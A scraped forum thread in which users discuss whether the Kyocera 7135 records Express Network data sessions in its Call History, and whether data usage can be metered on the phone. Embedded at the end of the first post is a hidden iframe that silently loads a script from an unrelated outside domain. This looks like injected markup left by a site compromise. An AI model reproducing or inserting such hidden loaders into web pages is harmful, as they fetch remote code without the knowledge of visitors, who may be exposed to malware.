+ Reply to Thread

7135 Call Log Quiz

Can anyone with a 7135 using the Express Network under a plan that counts EN usage as MINUTES tell me if anything at all gets put into the Call History log? I suspect not, but thought I'd ask.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: 7135 Call Log Quiz

Originally posted by rlwhitt
    Can anyone with a 7135 using the Express Network under a plan that counts EN usage as MINUTES tell me if anything at all gets put into the Call History log? I suspect not, but thought I'd ask.
    Nothing shows up on Call History. By the way if you can figure out how to get Minute Counter to count packet data minutes, I'd be eternally grateful!!

Re: 7135 Call Log Quiz

Originally posted by rlwhitt
    Can anyone with a 7135 using the Express Network under a plan that counts EN usage as MINUTES tell me if anything at all gets put into the Call History log? I suspect not, but thought I'd ask.
    I have the EN service that counts against my Minutes and NOTHING shows up in my Call History. I know people have asked if there is a way to find out how much EN is used through MB but from tis request it sounds like you are trying to see if you can get the info that goes against your minutes. God that would be wonderful!!!!!!!!!!!

if there is ANYTHING I can do to help please let me know. By the way I am using version 5.04i

Counting EN data, either by minute or KB, promises to be a tough nut to crack. I'm investigating patching into netlib for the Kb data, but that would not help the minute plan folks. I may create a test app and ask someone to run it for data calls and see if any of the post call signals get tripped. Stay tuned...

Sir rlwhitt
    I'm all for whatever effort needs to be put into metering usage. Id be suprised if the carriers didn't already have this one worked out, or if its not part of their "can you bear me now?" testing of this device w/express network.
    Whether the output be Bytes, Time, or Power... Systems monitoring needs to be top priority.
    (Your efforts will not go unrewarded.)

Tuned. <bugle>

Oh there's no doubt that the CARRIER can monitor it. Problem is the phone side. Something tells me that functionality to give the customer himself an accurate accounting of his usage is NOT high on the carriers' list of requirements to handset vendors.

Originally posted by aka.bugle
    Sir rlwhitt
    I'm all for whatever effort needs to be put into metering usage. Id be suprised if the carriers didn't already have this one worked out, or if its not part of their "can you bear me now?" testing of this device w/express network.
    Whether the output be Bytes, Time, or Power... Systems monitoring needs to be top priority.
    (Your efforts will not go unrewarded.)

Tuned. <bugle>

::cough:: lost packets ::cough:: billed for resent data ::cough::

Express Network in Call History??

Well, I thought I would resurrect this old thread, just to see if anybody has any new information on how to cause Express Network calls to show up in the call history database.

Anybody?